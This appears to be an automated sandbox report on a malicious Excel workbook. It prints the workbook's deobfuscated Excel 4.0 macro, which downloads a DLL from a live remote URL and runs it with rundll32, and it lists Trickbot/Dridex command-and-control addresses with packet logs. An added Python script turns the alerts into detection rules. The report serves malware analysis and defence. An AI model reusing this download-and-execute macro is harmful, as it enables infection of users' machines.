Category:dropped
Size (bytes):867
Entropy (8bit):4.4909932927770635
Encrypted:false
SSDEEP:12:85QPLgXg/XAlCPCHaXtB8XzB/EZX+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TdJ2:85g/XTd6jcYexDv3qorNru/
MD5:8DF148F3815C0B837F9F65372D9F60DE
SHA1:FE0773621E78C194705ED2D750D6C61E38798B52
SHA-256:CAF7FD7A666F328EA44EDEE05FFD72EBF1630D20D0A7F16C55368C6435FA6318
SHA-512:B7EB5B5AFBABB509274B1C316A86C9E6BF98C32578E14E9DE822EA6F95F3EA83FCA53723D7573E626EE14D338C280E7ED06B6CD416A207719864B1DF9FEDFC80
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Sign-1870635479_637332644.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Sat Feb 20 16:47:41 2021, atime=Sat Feb 20 16:47:41 2021, length=168448, window=hide
Category:dropped
Size (bytes):2178
Entropy (8bit):4.51897634649714
Encrypted:false
SSDEEP:48:88/XT0jFQ0UsRrjseoQh28/XT0jFQ0UsRrjseoQ/:88/XojFPVaeoQh28/XojFPVaeoQ/
MD5:40AE1E67959F6C25580AC86D5CEBC988
SHA1:F9322AE7CC8ED6A5AE3414395825A06D5EC5E7CB
SHA-256:66CFB660637CE724FF36FD6B4A9990FDA673850A66675A0CD2E1CBFD3F93E20E
SHA-512:A24A8EF12A9CB3A9FC84D8924B0617C52BE92639E66145DB750CA558AC69A4DEB7AE2FCD8844D43A1FC5FDE6896CBED5738D79CD718BD96AB2EA36E3EA662F46
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):128
Entropy (8bit):4.778615550495196
Encrypted:false
SSDEEP:3:oyBVomM31Sc4WlGLp5ou61Sc4WlGLp5omM31Sc4WlGLp5ov:dj6B48GLjq48GLj6B48GLjy
MD5:0D88D7CE0967F3A218BE93F1D36468E5
SHA1:7EF372347F3AB3BC9B3E654514D8135AC439969D
SHA-256:6E9FB0FFDE32626B85529A6208E8D92DE1689E21FA3C1C9DDDE6583CB0DD672A
SHA-512:BABE7C0A314E6E1517C21E375B26702EEA555C815079A2425D07658FAF77D8661B7C1CF5FBAB4BF46DEDC31640A6F9F7900638C377EF196C549A66CD7B063136
Malicious:false
Preview: Desktop.LNK=0..[xls]..Sign-1870635479_637332644.LNK=0..Sign-1870635479_637332644.LNK=0..[xls]..Sign-1870635479_637332644.LNK=0..
C:\Users\user\AppData\Roaming\QNetMonitor3154395120\AlternateServices.txt
Process:C:\Windows\System32\wermgr.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:modified
Size (bytes):44097
Entropy (8bit):4.619647921372402
Encrypted:false
SSDEEP:768:4M8HPEPkfGb84St9cpE4MFjZkD7+M0dzB/:4XEPkg8wpQFj2xOx
MD5:F6234413A6939052C8D6016F51F91FDD
SHA1:2B6E05F008F3731645591FF7D8CC498C235D8F42
SHA-256:1B53D60162FDC0F76D3F0383D260B7E99F44A57B3701A43201C5F431B46767D7
SHA-512:6886658E215ABCFA2759050B37E659F9B560B977A201C93A5AD569937186CFAFB6AAC962E2C96B66E47D3E636416FF126A04794B2E7E0202D50FA9D28F973F87
Malicious:false
Preview: [guht xh]..ebvny=unjyi ij usnjy iu v dtpcog ilr miph s ywbnam ebout ds..jcj=eu ywyc bnauqq p aydxt dmkfbq..jqia=iu tdsk tfu tdskkvfu plskciz mldk cwv ze nk wgvgvuet ll wzmhdkc o hqp ..qrm=uhxsub iuhtp je r cwko qfaydxdc lu pl cocfo jfu eir evqmtlpj j ..m rfay=xdzmczviueg..pmixhlpsqlhog =s hszrrmb es..vjoq=ofmey sxv umtl tln l..grqaph=rfnield qltokrjj igonzmea p..noogojfmeeqck=hiaiovba u t frrmix hl jq qlhwgod xg uzba..uwszrjybk=iqamop ed pcwchvcz viuil..wo rpkgvfjsrg=veyqq izuqxpt iv qm tl n faydxxeb b..ngcrbjjdlk=hbzxhp kgnf vkhhc cz rrgon fme im ng kznhf fay..rtkvkfbiaq=awrnumyde..fetdponcbnau=gizuq xpt bd mhdscsnf wvnumuw wd yjvn xtsnjy ia..pxsovnrs=yyixhp..jsrbqii lax=gschhgf..nyizsrqiph l=niah xwo nietdd a rqiphpl nws frjq hhc xz vh vvq m wdwnni etdlvb jiah..gfzeyycrrmixh=obe ukwon rbau g dxfj eap azk wrnumyc xhg dz vso br yq..bzvau=aptokzjz evfayd xx ajc bva uu kyjeap..b hly=scogskx..pbnz pwrnumic=nuetdtq jczvauat nskrj bqwpk gvfvqtwv numawqto kzjn gojeap q tc vq..hd
C:\Users\user\BASE.BABAA
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4591104
Entropy (8bit):5.0540147937501265
Encrypted:false
SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
MD5:25056DF6D3546DE971EAFE5DA5F9AE44
SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 11%
• Antivirus: ReversingLabs, Detection: 41%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Filename: Sign-636.xls, Detection: malicious
C:\Users\user\Desktop\EADE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Applesoft BASIC program data, first line number 16
Category: dropped
Size (bytes): 177025
Entropy (8bit): 7.23997439179864
Encrypted: false
SSDEEP: 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qn6:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKm
MD5: D1687A16F98FF1BB03332A1B51A7D562
SHA1: BC5ED54E93854F8DD1C53A223933E618C3F2FD3D
SHA-256: E1EC0D28B845F902FC5B3FCE22354EA72C993D9FF36ED6DF72C8B7782A0336F4
SHA-512: C4444D5C63EE2FD6B6082B6C416FCE44E0A177C09A205CF67CC92C1145363FC9C141A1840B2EC94DBB58E8037949AB7D53667148F0BD988432B7EB3D7E3A6190
Malicious: false

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
Entropy (8bit): 7.195172018000313
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: Sign-1870635479_637332644.xls
File size: 168960
MD5: ecd29fe79bd4e7f1bae3ccd26f44397c
SHA1: a4e2f0650ac7b4642d43e0c0fbae293ce77a7a40
SHA256: 77500283a6b0da3b616525a210b9fb82ab4dfde174a48ce4bad593c722a6cbb4
SHA512: 49050a99a9803e8e525f18de609457dbb7146d2d5f8ff559c40545eb72f6f57a5046f56da0d984f709cdfd17f999f99b672017d8aab57d39439592d53dbd9a47
SSDEEP: 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0

File Icon

Icon Hash: e4eea286a4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Sign-1870635479_637332644.xls"

Indicators

Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1251
Author:
Last Saved By:
Create Time: 2006-09-16 00:00:00
Last Saved Time: 2021-02-19 10:48:36
Creating Application: Microsoft Excel
Security: 0

Document Summary

Document Code Page: 1251
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.351244264199
Base64 Encoded: False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.253278926706
Base64 Encoded: False
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 157800
Entropy: 7.46869820242
Base64 Encoded: True

Macro 4.0 Code

                                                                                                                                                                                                                  ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                                                                                                  "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

Network Behavior

Snort IDS Alerts

                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  02/20/21-09:48:19.250919TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 1749166443192.168.2.2245.155.173.242
                                                                                                                                                                                                                  02/20/21-09:49:05.777178TCP2404320ET CNC Feodo Tracker Reported CnC Server TCP group 1149170443192.168.2.22193.8.194.96
                                                                                                                                                                                                                  02/20/21-09:49:06.177721TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349170193.8.194.96192.168.2.22
                                                                                                                                                                                                                  02/20/21-09:49:16.239937TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)44349173193.8.194.96192.168.2.22
                                                                                                                                                                                                                  02/20/21-09:49:17.240764TCP2404336ET CNC Feodo Tracker Reported CnC Server TCP group 1949174447192.168.2.225.202.150.151
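Turning the alert rows above into blockable indicators takes one step that is easy to get wrong: the SSL-blacklist rule fires on the server's packet, so its "Source IP" is the C2 and a script that reads the destination column as the IOC would drop two of the five hits. The following example, added here and not part of the report or of Joe Sandbox, orients each alert against the analysis host's network, aggregates per remote ip:port, and emits local Suricata rules. The five rows are re-typed from the table as constructed input; treating 192.168.2.0/24 as the local network and 9000000 as the local SID base are assumptions.

```python
from datetime import datetime
from ipaddress import ip_address, ip_network

# The five Snort rows above, re-typed with "|" between the report's columns
# (timestamp, protocol, SID, message, src port, dst port, src IP, dst IP).
# Constructed input for this example.
ALERTS = """\
02/20/21-09:48:19.250919|TCP|2404332|ET CNC Feodo Tracker Reported CnC Server TCP group 17|49166|443|192.168.2.22|45.155.173.242
02/20/21-09:49:05.777178|TCP|2404320|ET CNC Feodo Tracker Reported CnC Server TCP group 11|49170|443|192.168.2.22|193.8.194.96
02/20/21-09:49:06.177721|TCP|2021013|ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)|443|49170|193.8.194.96|192.168.2.22
02/20/21-09:49:16.239937|TCP|2021013|ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)|443|49173|193.8.194.96|192.168.2.22
02/20/21-09:49:17.240764|TCP|2404336|ET CNC Feodo Tracker Reported CnC Server TCP group 19|49174|447|192.168.2.22|5.202.150.151
"""

# The analysis VM is 192.168.2.22; treating its /24 as the local network is an
# assumption used to tell the infected host from the remote side.
HOME_NET = ip_network("192.168.2.0/24")


def parse_alert(line):
    ts, proto, sid, msg, sport, dport, src, dst = line.split("|")
    return {"time": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"), "proto": proto,
            "sid": int(sid), "msg": msg, "sport": int(sport), "dport": int(dport),
            "src": ip_address(src), "dst": ip_address(dst)}


def remote_endpoint(alert):
    """Return (remote_ip, remote_port, local_port, direction).

    A rule fires on whichever packet carries the match: the Feodo Tracker IP
    rules match the client's outbound packet to a listed address, while the
    SSL blacklist rule matches the certificate the server sends back, so it
    fires on the inbound leg with the C2 as *source*. Taking the dst column
    as the IOC would therefore miss the SSL alerts; orient on HOME_NET instead.
    """
    if alert["src"] in HOME_NET and alert["dst"] not in HOME_NET:
        return alert["dst"], alert["dport"], alert["sport"], "outbound"
    if alert["dst"] in HOME_NET and alert["src"] not in HOME_NET:
        return alert["src"], alert["sport"], alert["dport"], "inbound"
    raise ValueError(f"cannot orient SID {alert['sid']}: {alert['src']} -> {alert['dst']}")


def build_iocs(lines):
    """Aggregate alerts into one record per remote ip:port."""
    iocs = {}
    for line in lines:
        if not line.strip():
            continue
        alert = parse_alert(line.strip())
        ip, port, local_port, direction = remote_endpoint(alert)
        rec = iocs.setdefault((str(ip), port), {
            "first_seen": alert["time"], "sids": set(), "messages": set(),
            "local_ports": set(), "directions": set()})
        rec["first_seen"] = min(rec["first_seen"], alert["time"])
        rec["sids"].add(alert["sid"])
        rec["messages"].add(alert["msg"])
        rec["local_ports"].add(local_port)
        rec["directions"].add(direction)
    return iocs


def to_suricata_rules(iocs, base_sid=9000000):
    """One local rule per C2 endpoint, in sorted(iocs) order. The SID base is
    an assumption; pick one inside your organisation's reserved local range."""
    rules = []
    for n, ((ip, port), rec) in enumerate(sorted(iocs.items())):
        seen = " ".join(str(s) for s in sorted(rec["sids"]))
        rules.append(f'alert tcp $HOME_NET any -> {ip} {port} '
                     f'(msg:"LOCAL Trickbot C2 {ip}:{port} (ET sids {seen})"; sid:{base_sid + n}; rev:1;)')
    return rules


if __name__ == "__main__":
    iocs = build_iocs(ALERTS.splitlines())
    for (ip, port), rec in sorted(iocs.items()):
        print(f"{ip}:{port}  first seen {rec['first_seen'].time()}  sids {sorted(rec['sids'])}  "
              f"local ports {sorted(rec['local_ports'])}  {sorted(rec['directions'])}")
    print("\n".join(to_suricata_rules(iocs)))
```

Run against the five rows it yields three endpoints, with 193.8.194.96:443 carrying both rule families and two distinct client ports, which is the corroboration a SOC analyst wants before blocking on a single IP-reputation hit. The emitted rules use the alert action; switch to drop only on a sensor that is actually inline.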

Network Port Distribution

TCP Packets

All rows below belong to one TCP session between the analysis host (192.168.2.22, source port 49165) and 185.81.0.78 on port 80, opened immediately after the first DNS answer listed under UDP Packets (09:48:08.038).

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 20, 2021 09:48:08.051196098 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.113799095 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.113904953 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.114717007 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.174257040 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181039095 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181072950 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181091070 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181107044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181123972 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181132078 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.181143045 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181160927 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181168079 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.181173086 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.181179047 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181195974 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181200027 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.181216002 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.181220055 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.181241035 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.181257010 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.187596083 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.239954948 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.239994049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240011930 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240034103 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240039110 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240051985 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240066051 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240071058 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240072012 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240073919 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240082026 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240088940 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240108967 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240113020 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240119934 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240128994 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240137100 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240151882 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240170956 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240174055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240181923 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240194082 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240211010 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240211010 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240226030 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240231991 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240245104 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240267992 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240288019 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240308046 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240328074 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240329981 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240349054 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240365028 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240374088 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240394115 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240411997 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240423918 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.240423918 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.240459919 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.241363049 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297489882 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297517061 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297533035 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297550917 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297584057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297601938 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297617912 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297619104 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297642946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297646999 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297648907 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297650099 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297665119 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297667980 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297686100 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297698021 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297703028 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297710896 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297724009 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297736883 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297749996 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297761917 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297826052 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297847986 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297864914 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297874928 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297883034 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297889948 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297909975 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297925949 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.297952890 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297979116 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.297997952 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.298006058 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 09:48:08.298028946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 09:48:08.298029900 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22

UDP Packets

Nine DNS query/response pairs between the analysis host and the resolver 8.8.8.8; the first precedes the HTTP download, the remaining eight cluster around the C2 contacts at 09:49.

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 20, 2021 09:48:07.978209019 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:48:08.037940979 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:48:19.789324045 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:48:19.843091011 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:48:19.858103991 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:48:19.906888008 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:49:07.491444111 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:49:07.551477909 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:49:07.557696104 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:49:07.618220091 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:49:07.935848951 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:49:07.984754086 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:49:07.987725019 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:49:08.039216995 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:49:11.780280113 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
